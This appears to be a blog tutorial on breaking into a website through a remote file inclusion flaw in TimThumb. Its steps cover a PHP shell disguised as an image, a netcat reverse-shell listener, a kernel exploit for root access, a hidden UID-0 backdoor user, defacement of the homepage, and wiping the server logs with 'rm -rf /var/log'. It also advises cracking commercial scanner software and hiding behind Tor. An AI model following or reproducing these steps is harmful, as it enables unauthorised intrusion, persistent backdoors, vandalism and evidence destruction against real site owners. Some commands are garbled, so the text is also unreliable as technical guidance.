Hacking A Website VIA RFI

08:11 ---

Tools Required :
Backtrack/Kali
– Backtrack/kali is a Linux distribution based on
Ubuntu. It includes everything you need to
become a good hacker. Apart from this,
hacking behind a Linux system is better than
a Windows one since most Websites are on
Linux Servers.
(Just a little tip: To wirelessly connect to a
network use the Wicd Network Manager,
located under the Applications->Internet)
Firefox
– Firefox is the best browser for hacking. You
can easily configure a proxy and you can
download millions of add-ons among which
you can find some for Hacking. Find more
about “Hacky” addons for Firefox Here….
Netcat
– Netcat is a powerful networking tool. You
will need this to root the server….
iCon2PHP & Good Shells
– iCon2PHP is a tool I created and you will
use it if you upload the image to an Image
Uploader at a Forum or Image Hosting
Service. iCon2PHP Archive contains some of
the top shells available.
Good VPN or TOR (Proxies are good too…)
– While hacking you need to be anonymous so
as not to find you (even if you forget to delete
the logs….). A VPN stands for Virtual Private
Network and what it does is: hiding your IP,
encrypting the data you send and receive to
and from the Internet. A good VPN solution
for Windows Maschines is ProXPN. However,
with VPN connections (especially when you
are under a free VPN connection) your
connection speen is really slow. So, I wouldn’t
recommend VPN except if you pay and get a
paid account.
What I would recommend is Tor . Tor can be
used from its bundle: Vidalia, which is a great
tool for Windows, Mac and Linux that uses
Proxies all over its network around the world
so as to keep you anonymous and changing
these Proxies every 5-10 minutes. I believe it
is among the best solutions to keep you
anonymous if you don’t want to pay for a
Paid VPN account
Apart from Tor, simple Proxies are good but I
wouldn’t recommend them as much as I would
for Tor.
— If I listed the above options according to
their reliability :
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner
– Acunetix is (maybe the best) Vulnerability
Scanner. It scans for open ports,
vulnerabilities, directory listing. During the
scan it lists the vulnerabilities and says how a
hacker can exploit it and how to patch it. It
also shows if it is a small or big vulnerability.
The Consultant Edition (For unlimited
websites) costs about 3000-7000$.
______________________________________________
______________
Starting the Main Tutorial:
So, here is the route we will follow:
Find a Vulnerable Website –> Upload a c100
Shell (Hidden in an Image with iCon2PHP) –>
Rooting the Server –> Defacing the Website –
> Covering your Tracks
- – - Before we begin – - -
-Boot to Backtrack/kali linux
-Connect to your VPN or to Tor.
-Open Firefox.
1. Finding a Vulnerable Website and
Information about it:
Crack Acunetix (find tutorial at
Hackforums.net). Open and scan the website
(use the standard profile – don’t modify
anything except if you know what you are
doing). For this tutorial our website will be:
http://www.website.com (not very innovative, I
know….)
Let’s say we find a vulnerability where we can
upload a remote file (our shell) and have
access to the website’s files.
The Warning should be something like this. It
can mention other information or be a
completely other warning (like for SQL
Injection – I will post a Tutorial on this also…)
, too! (Depends on the Vulnerability) What we
need at this tutorial is that we can exploit the
‘File Inclusion Attack’ and Have access to the
Website’s Files. (This is not the warning we
need for this tutorial, but it is related to what
we do too.)
OK. Now, we have the site and the path that
the vulnerability is. In our example let’s say it
is here:
http://www.website.com/wp-content/
themes/theme_name/thumb.php
The above vulnerability affects WordPress
blogs that have installed certain plugins or
themes and haven’t updated to the latest
version of TimThumb, which is a image-editing
service on websites.
OK. Acunetix should also mention the OS of
the Server. Assuming that ours is a Unix/
Linux system (so as to show you how to root
it) .
For now, we don’t need anything more from
Acunetix.
2. Uploading the shell:
Till now, we know:
-The website’s blog has a huge vulnerability
at TimThumb.
-It is hosted on a Unix System.
Next, because of the fact that the Vulnerability
is located at an outdated TimThumb version,
and timthumb is a service to edit images, we
need to upload the shell instead of the image.
Thus, download any image (I would
recommend a small one) from Google Images.
We don’t care what it shows.
Generate Output with iCon2PHP
Copy your Image and your Shell to the Folder
that iCon2PHP is located.
Run the Program and follow the in-program
instructions to build the ‘finalImage.php’.
To avoid any errors while uploading rename
the ‘finalImage.php’ to ‘image.php;.png’
(instead of png, type the image format your
image was – jpeg,jpg,gif….) This is the exactly
same file but it confuses the uploader and
thinks that it actually is an image.
iCon2PHP Terminal Output:
[...]
Enter the Path of your Image: image.png
Please enter the path to the PHP:
AnonKnw.php
Entered!
Valid Files!
[...]
File: ‘finalImage.php’ has been
successfully created at the Current
Directory…
Upload Output to a Server:
Next, upload your ‘image.php;.png’ at a free
server. (000webhost, 0fees etc….)
Go to the vulnerability and type at the URL:
http://www.website.com/wp-content/
themes/theme_name/thumb.php
?src=http://flickr.com . domain.0fees.net/
image.php;.png
It would be better to create a subdomain like
“flickr.com” (or other big image-hosting
service) because sometimes it doesn’t accept
images from other websites.
Website…. Shelled!
OK. Your website is shelled. This means that
you should now have your shell uploaded and
ready to root the server.
You could easily deface the website now but it
would be better if you first rooted the server,
so as to cover your tracks quickly.
3. Root the Server:
Now that you have shelled your website we
can start the proccess to root the server.
What is rooting when it comes for Server
Hacking?
—> Rooting a server is the proccedure
when the hacker acquires root priviliges
at the whole server. If you don’t
understand this yet, I reasure you that by
the end of the section “Rooting a server”
you will have understood exactly what it
is…
Let’s procceed to rooting….
Connect via netcat:
1. Open a port at your router. For this tutorial
I will be using 402. (Search Google on how to
port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:
netcat
4. Now type:
-l -n -v -p 402
5.It should have an output like this:
listening on [any] 402 port
6. Now, go to the Back-Connection function at
the Shell.
7. Complete with the following:
Host:YouIPAddress Port: 402 (or the port
you forwarded….)
8. Hit connect and… Voila! Connected to the
server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet…
2. To do so we have to download a kernel
exploit. The kernel version is mentioned at
your shell. Find kernel exploits frm google & other sources.
3. Download it to your HDD and then upload it
to the server via the Shell. Unzip first, if
zipped….
4. Now do the following exploit preparations:
– The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you have first to
compile it by typing: gcc exploit.c -o
exploit ))
– Change the permissions of the exploit:
chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to
ensure:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M
root1
where root1 is your desired username
8. Change the password of the new root user:
passwd root1
SUCCESSFULLY ROOTED!
4. Deface the Website:
What is defacing?
Defacing is the proccedure when the
hacker uploads his own inbox webpage to
alter the homepage of a site. In this way,
he can boost his reputation or parse a
message to the people or the company
(which owns the website…).
Since you got the website shelled, you just
create a nice hacky page in html and upload it
via the Shell as inbox.html (Delete or rename
the website’s one…)
5. Cover your tracks:
Till now you were under the anonymity of Tor
or ProXPN. You were very safe. However, in
order to ensure that it will be impossible for
the admin to locate you we have to delete
logs.
First of all, Unix based-Maschines have some
logs that you have better to either edit or
delete.
Common Linux log files name and their usage:
/var/log/message: General message and
system related stuff
/var/log/auth.log: Authenication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory
(more files inside this directory)
/var/log/httpd/: Apache access and error
logs directory
/var/log/lighttpd: Lighttpd access and
error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database
server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login
records file
/var/log/yum.log: Yum log files
In short /var/log is the location where you
should find all Linux logs file.
To delete all of them by once type:
su root1
rm -rf /var/log
mkdir /var/log
End of this Tutorial:

Thanx For Reading!!!!

0 comments: